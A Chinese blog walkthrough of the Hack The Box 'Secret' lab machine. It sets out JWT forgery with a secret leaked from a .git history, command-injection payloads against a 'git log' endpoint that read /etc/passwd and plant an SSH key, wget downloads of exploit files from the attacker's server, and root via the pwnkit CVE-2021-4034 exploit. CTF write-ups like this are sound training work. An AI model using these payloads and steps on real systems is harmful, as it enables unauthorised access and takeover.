其他分享
首页 > 其他分享> > [Hack The Box] HTB—Secret walkthrough

[Hack The Box] HTB—Secret walkthrough

作者:互联网

[Hack The Box] HTB—Secret walkthrough

machine :Hack The Box—Secret

image-20220224094751851

HTB—Secret


一、信息搜集

nmap

nmap -sV 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

深度扫描开放端口

nmap -sC -sV -n -T5 -p 22,80,3000 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

二、网站渗透

照着文档写得,curl注册

image-20220224102333723

curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"name":"xiaozz", "email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/register

image-20220224102504284

登陆

image-20220224102611796

curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/login

image-20220224102740419

auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoieGlhb3p6IiwiZW1haWwiOiJ4aWFvekBkYXNpdGgud29ya3MiLCJpYXQiOjE2NDU2Njk2NDZ9.dQlJD5uraui5jzOJRvqdJ_5c4PARMhbYbMW-pAz4Ixs

认证image-20220224103049265


1.jwt伪造

我们需要admin权限,尝试jwt绕过 jwt.io

image-20220224105308974

翻到密钥在.env中

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret

image-20220224105342816

TOKEN_SECRET = secret不对,发现有git泄露,尝试用.git恢复,这里我找到一个方便的工具:gakki429/Git_Extract: 提取远程 git 泄露或本地 git 的工具 (github.com)

python2 git_extract.py ../.git

image-20220224105451809

找到真正的TOKEN_SECRET

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE

image-20220224105521505

连系代码local-web\routes\private.js

router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;
    const userinfo = { name: req.user }
    const name = userinfo.name.name;
    
    if (name == 'theadmin'){
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

name == 'theadmin'修改jwt

image-20220224105842338

admin的jwt

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4

成功登陆admin,登陆后看http://10.10.11.120:3000/api/logs


2.命令执行

const getLogs = git log --oneline ${file}; private.js这段代码会有一个命令执行

http://10.10.11.120:3000/api/logs?file=123;whoami;

image-20220224110137099

反弹shell失败,看别人wp是写入ssh公钥(因为看etc/passwd,我们现在这个用户是有登陆权限的)

curl -i \
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  'http://10.10.11.120/api/logs?file=index.js;id;cat+/etc/passwd' | sed 's/\\n/\n/g'

利用sed 's/\\n/\n/g'换行输出

image-20220224112730213


3.写入ssh公钥

kali攻击机上:

ssh-keygen -t rsa //在攻击机上生成ssh公钥和私钥,密码设置为空
cd /root/.ssh
export PUBLIC_KEY=$(cat id_rsa.pub)   //将公钥的内容存储到 bash 变量中

然后执行命令

mkdir -p /home/dasith/.ssh
echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys

image-20220224113850317

curl

curl -i \ //-i 显示返回的headers
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  -G \  //以get传数据file
  --data-urlencode "file=123;mkdir -p /home/dasith/.ssh;echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys"\   //url编码
  'http://10.10.11.120/api/logs'

image-20220224113901867

ssh登陆

ssh dasith@10.10.11.120

image-20220224114115169

得到user flag


三、提权

老样子linpeas.sh

image-20220224115404724

有pkexec提权的CVE-2021-4034

开个http server

python3 -m http.server 8080

传文件过去

wget http://10.10.14.25:8080/Makefile
wget http://10.10.14.25:8080/cve-2021-4034.c
wget http://10.10.14.25:8080/pwnkit.c
make
./cve-2021-4034

image-20220224123241889

得到root flag

在这里插入图片描述


参考wp:

https://drt.sh/posts/htb-secret/

标签:Box,http,name,11.120,walkthrough,Secret,ssh,file,10.10
来源: https://blog.csdn.net/weixin_46081055/article/details/123115290